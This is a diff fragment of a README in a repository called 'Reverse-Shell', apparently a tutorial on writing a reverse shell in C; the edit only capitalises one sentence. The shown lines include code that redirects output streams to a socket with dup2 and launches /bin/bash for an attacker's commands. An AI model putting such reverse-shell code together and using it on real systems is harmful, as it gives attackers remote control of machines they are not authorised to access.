4K4-ViP3R/Reverse-Shell/README.md

 - dup2(sockt, 1);
 - dup2(sockt, 2);

-finally need to create constant that help to store the command that attacker want to execute.
+Finally need to create constant that help to store the command that attacker want to execute.
 First need to declare the data type character and the constant itself.

 - char * const argv [] = {“/bin/bash”, NULL}